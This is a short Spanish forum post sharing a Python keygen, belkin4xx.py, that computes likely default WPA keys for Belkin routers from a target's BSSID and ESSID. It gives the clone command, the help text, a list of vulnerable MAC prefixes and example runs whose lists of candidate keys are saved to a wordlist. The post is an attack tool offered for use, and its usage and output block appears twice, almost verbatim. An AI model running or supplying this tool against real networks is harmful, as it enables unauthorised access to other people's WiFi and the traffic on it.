Siento no dar más detalle pero no tengo más tiempo. Leer las referencias en el codigo
Repositorio:
Citar
Descarga:
Código:
$ git clone https://dudux@bitbucket.org/dudux/belkin4xx.git
Uso:
Citar
$ python belkin4xx.py -h
usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
[-a | -l]
>>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
likely vulnerable, although routers using those macaddresses could be
vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-w [WORDLIST], --wordlist [WORDLIST]
Filename to store keys
-a, --allkeys Create all possible cases. Definitely recommended if
first attempt fails
-l, --list List all vulnerable mac address so far
required:
-b [BSSID], --bssid [BSSID]
Target bssid
-e [ESSID], --essid [ESSID]
Target essid. [BelkinXXXX,belkin.XXXX]
(+) Help: python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
$ python belkin4xx.py -l
essid: Belkin.XXXX
essid: Belkin_XXXXXX
essid: belkin.xxxx
essid: belkin.xxx
bssid: 94:44:52:uv:wx:yz
bssid: 08:86:3B:uv:wx:yz
bssid: EC:1A:59:uv:wx:yz
$ python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
$ cat keys.txt
64949db9
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0
usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
[-a | -l]
>>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
likely vulnerable, although routers using those macaddresses could be
vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-w [WORDLIST], --wordlist [WORDLIST]
Filename to store keys
-a, --allkeys Create all possible cases. Definitely recommended if
first attempt fails
-l, --list List all vulnerable mac address so far
required:
-b [BSSID], --bssid [BSSID]
Target bssid
-e [ESSID], --essid [ESSID]
Target essid. [BelkinXXXX,belkin.XXXX]
(+) Help: python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
$ python belkin4xx.py -l
- Possible vulnerable targets so far:
essid: Belkin.XXXX
essid: Belkin_XXXXXX
essid: belkin.xxxx
essid: belkin.xxx
bssid: 94:44:52:uv:wx:yz
bssid: 08:86:3B:uv:wx:yz
bssid: EC:1A:59:uv:wx:yz
$ python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
- Your WPA key might be :
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
- Your WPA key might be :
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
- Your WPA keys might be :
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0
$ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
$ cat keys.txt
64949db9
D40493B0
649996b9
649496b9
d49496b9
34029DB0
d49996b9
D40293B0
64999db9
340493B0
34009DB0
340093B0
34049DB0
340293B0
D40093B0